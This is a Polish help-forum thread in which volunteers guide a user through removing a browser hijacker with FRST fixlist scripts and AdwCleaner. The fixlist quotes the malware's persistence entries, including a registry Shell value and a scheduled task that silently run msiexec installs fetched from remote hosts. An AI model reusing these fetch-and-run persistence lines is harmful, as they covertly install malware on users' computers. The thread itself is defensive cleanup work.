Witam
Mam problem z “mystart.dealwifi.com ” tzw. porywaczem przeglądarki, próbowałem już wszystkiego co potrafiłem i nic nie pomogło. Mam antywirusa Avasta i używam głownie przeglądarki Firefoxa Mozilla>
Logi:
FRST - http://www.wklej.org/id/3098077/
Addition - http://www.wklej.org/id/3098086/
Mam nadzieje że dobrze to zrobiłem, jak coś proszę o pomoc w pozbyciu się tego dziadostwa.
Atis
(Atis)
26 Kwiecień 2017 20:07
#2
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :
CloseProcesses:
HKU\S-1-5-21-272777192-2743495117-1981564813-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj82FTI2MjwcMkNYFjI1Mjw4MTNYRkF2MWLXRWI3FTlQRH== /q
IFEO\taskmgr.exe: [Debugger]
FF Extension: (SimilarWeb) - C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\0nejma8k.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-25] [Brak podpisu cyfrowego]
FF Extension: (HSearch) - C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\0nejma8k.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-25] [Brak podpisu cyfrowego]
FF Extension: (FF Adr) - C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\0nejma8k.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-25] [Brak podpisu cyfrowego]
FF SearchPlugin: C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\0nejma8k.default\searchplugins\startsearch.xml [2017-04-25]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA
S3 MSICDSetup; \??\G:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\G:\NTIOLib_X64.sys [X]
R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [110592 2017-04-24] () [Brak podpisu cyfrowego]
2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\ProgramData\Apple
2017-04-26 19:35 - 2017-04-26 19:35 - 00000000 ____D C:\Users\Admin\Desktop\FRST-OlderVersion
2017-04-26 19:26 - 2017-04-26 19:26 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-04-25 17:37 - 2017-04-26 05:45 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Windows\system32\log
2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Firefox
2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Users\Admin\AppData\Local\Firefox
2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Users\Admin\AppData\Local\Doeye
2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\Program Files (x86)\Doeye
2017-04-25 17:37 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2017-04-25 17:37 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys
2017-04-22 09:01 - 2017-04-26 18:50 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-21 17:41 - 2017-04-25 17:37 - 00000000 _____ C:\Windows\SysWOW64\33
2017-04-21 17:41 - 2017-04-25 17:37 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-19 22:20 - 2017-04-22 00:43 - 00000000 ____D C:\AdwCleaner
2017-04-19 17:50 - 2017-04-19 22:17 - 00000000 ____D C:\Users\Admin\AppData\Local\3DM
2017-04-19 17:45 - 2017-04-25 17:36 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-07 21:10 - 2017-04-07 21:10 - 01255768 _____ ( ) C:\Users\Admin\Downloads\foobar2000-13337-AsystentPobierania.exe
2017-04-13 21:39 - 2017-02-18 10:17 - 00000000 ____D C:\Users\Admin\AppData\Roaming\ScreenShot
C:\Users\Admin\AppData\Roaming\Minecraft 1.9.0.exe
C:\Program Files (x86)\ScreenShot
Task: {1BD9BCA8-F8C6-41F8-BAEE-6C96AE1A576F} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA
Task: {07745AAC-C3EE-4732-B28B-CA80FFF5A567} - System32\Tasks\Opera scheduled suite Autoupdate 1486935636 => C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe [2017-02-27] (Opera Software)
Task: {A6761DC8-66AE-4A66-8255-51645AD23B4C} - System32\Tasks\Opera scheduled Autoupdate 1486935635 => C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe [2017-02-27] (Opera Software)
Task: {DCF175BA-217A-4DC4-94CE-ABBC8627BFD6} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {E716AA2E-91C7-4B9F-8ACC-A25103D3E48E} - System32\Tasks\{58AEC91D-BBCC-4727-A767-00A206BBC88E} => pcalua.exe -a "C:\Users\Admin\Desktop\Moje dokumenty\Programy\wp5_3pl.exe" -d "C:\Users\Admin\Desktop\Moje dokumenty\Programy"
Task: {F9D96F4C-FD1A-4824-A974-8E8B71CAC5C9} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA
Shortcut: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.)
R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [110592 2017-04-24] () [Brak podpisu cyfrowego]
2017-04-25 17:37 - 2017-04-25 17:37 - 00000000 ____D C:\ProgramData\Apple
FirewallRules: [{1F227469-11D2-4A32-ABEB-4857B8A7FB68}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{D8A16020-3E60-44EB-A750-BA477C765479}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{9D523995-54F6-4C14-A3A3-09C236E41F68}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe
EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.
Zrobiłem i tak:
Raport z usuwania Fixlog - http://www.wklej.org/id/3098230/
Skan po usuwaniu:
FRST - http://www.wklej.org/id/3098232/
Z tego co zobaczyłem nie mogę uruchomić Chroma a Firefox jest tylko po angielsku, wszystko teraz robiłem na Operze
Atis
(Atis)
26 Kwiecień 2017 23:31
#4
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :
C:\Users\Admin\AppData\Roaming\Firefox
C:\Users\Admin\AppData\Local\Firefox
C:\ProgramData\SWCUTemp
C:\Users\Public\Documents\temp.dat
DeleteQuarantine:
Uruchom FRST i kliknij Napraw (Fix). Później skasuj folder C:\FRST
Czyszczenie folderów Przywracania systemu
Przeczytaj w jaki sposób należy instalować programy: KLIK - KLIK - KLIK .
A potraktuj go ADWCleanerem…
I pozbądź się AVASTa
Zrobione, a co polecacie zamiast Avasta, jakoś się do niego przyzwyczaiłem i na poprzednim komputerze gdzie miałem XPka działał dobrze a na nowym kompie gdzie mam Windowsa 7 po 3 miesiącach zaczęły się jakieś dziadostwa w przeglądarkach,
Acorus
(Acorus)
28 Kwiecień 2017 15:51
#7
To nie ma nic wspólnego z Avastem.Możesz go zostawić.
Aha. Dziękuję za informację. Dziękuję za pomoc. Temat można zamknąć.